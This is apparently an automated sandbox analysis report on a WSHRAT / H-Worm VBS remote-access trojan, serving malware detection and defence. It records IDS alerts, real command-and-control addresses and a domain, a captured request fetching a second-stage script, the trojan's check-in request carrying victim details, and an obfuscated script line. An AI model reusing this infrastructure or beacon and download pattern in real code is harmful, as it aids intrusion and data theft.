                            Source: Submited SampleNeural Call Log Analysis: 99.8%
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]5_2_024FBA48

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49743 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49729 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49729 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49728 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49728 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49730 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49738 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49738 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49740 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49740 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49727 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49742 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49733 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49742 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49725 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49725 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49735 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49746 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49746 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49731 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49734 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49731 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49741 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49741 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49747 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49730 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49718 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49718 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49726 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49760 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49739 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49760 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49739 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49734 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49756 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49717 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49735 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49756 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49717 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49726 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49744 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49744 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49737 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49737 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49750 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49750 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49733 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49753 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49727 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49759 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49762 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49743 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49754 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49759 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49753 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49762 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49755 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49747 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49755 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49761 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49761 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49754 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49758 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49751 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49758 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49751 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49752 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49752 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49745 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49745 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49732 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49749 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49732 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49749 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49748 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49748 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2027447 - Severity 1 - ET MALWARE WSHRAT CnC Checkin : 192.168.2.4:49757 -> 104.168.7.12:6892
                            Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.4:49757 -> 104.168.7.12:6892
                            System process connects to network (likely due to code injection or exploit)
                            Source: C:\Windows\System32\wscript.exeNetwork Connect: 172.245.208.13 80Jump to behavior
                            Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.168.7.12 6892
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorURLs: lee44.kozow.com
                            Potential malicious VBS script found (has network functionality)
                            Source: Initial file: aTVJlgQpMqQBNfSosmvtCHeYEVPjWxKwdJMSFtgOMZwAHcQMJOwYuPZTpwEPRgTPgTXDSAjzFghdKdQcFDaIBmCNjt.SaveToFile RqVkNIXqpwdYPrkNFCGodcZLGwUMauVxsxspiBLguBINHUuwrCLxoWBoQJdRnLPubffRyueDrZt, JpGYbxYZXAbQutWjTRgectuCiFfHDaRcJhTkOgfurqSrkncQyLCoySEPvEqVRQWwizGMamUmmlnmbCRvcPJrYddrcDoKpJc
                            Uses known network protocols on non-standard ports
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 6892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 6892
                            Uses ping.exe to check the status of other devices and networks
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 65
                            Source: global trafficTCP traffic: 192.168.2.4:49717 -> 104.168.7.12:6892
                            Source: Joe Sandbox ViewIP Address: 172.245.208.13 172.245.208.13
                            Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                            Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                            Source: global trafficHTTP traffic detected: GET /wex/ggh.js HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.208.13Connection: Keep-Alive
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                            Source: global trafficHTTP traffic detected: GET /wex/ggh.js HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.208.13Connection: Keep-Alive
                            Source: global trafficDNS traffic detected: DNS query: lee44.kozow.com
                            Source: unknownHTTP traffic detected: POST /is-ready HTTP/1.1Accept: */*user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 15/4/2025|JavaScriptAccept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: lee44.kozow.com:6892Content-Length: 0Connection: Keep-AliveCache-Control: no-cache
                            Source: wscript.exe, 00000001.00000002.1345926232.000002BF13223000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1345384983.000002BF114EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1345841399.000002BF11775000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1343432506.000002BF1152A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1345634293.000002BF11574000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1343758832.000002BF114EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1338570705.000002BF137F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1343866311.000002BF11574000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1345477649.000002BF11531000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1344503722.000002BF114EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1344240544.000002BF133A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1343333967.000002BF11574000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1343941257.000002BF1152D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1343716078.000002BF1152C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.208.13/wex/ggh.js
                            Source: wscript.exe, 00000001.00000003.1343432506.000002BF1152A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1345477649.000002BF11531000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1343941257.000002BF1152D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1343716078.000002BF1152C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.208.13/wex/ggh.jsp.3
                            Source: wscript.exe, 00000003.00000003.1682858553.000001E9CD387000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com/14-4c59-bad8-9c31255dc46ah
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861C47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2597063240.000001F861F70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-ready
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-ready-A4
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-ready-A4x
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-ready/h
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-ready13862-A4x
                            Source: wscript.exe, 00000003.00000002.2596806001.000001E9CD34B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1682858553.000001E9CD346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-ready20
                            Source: wscript.exe, 00000003.00000002.2596588419.000001E9CD33E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-ready3
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-ready38638
                            Source: wscript.exe, 00000003.00000002.2596588419.000001E9CD33E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-ready4
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-ready6-A4x
                            Source: wscript.exe, 00000003.00000002.2596806001.000001E9CD34B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1682858553.000001E9CD346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-ready8076.amsi.csv
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-ready813S8R
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-ready862
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-readyL
                            Source: wscript.exe, 00000003.00000002.2596588419.000001E9CD319000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-readyO
                            Source: wscript.exe, 00000003.00000002.2596588419.000001E9CD33E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1683216538.000001E9CD33B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-readyParrs
                            Source: wscript.exe, 00000008.00000002.2596539768.000001F861CCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-readyV
                            Source: wscript.exe, 00000003.00000002.2596588419.000001E9CD319000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-readyX
                            Source: wscript.exe, 00000003.00000002.2596588419.000001E9CD33E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lee44.kozow.com:6892/is-readyadyEM
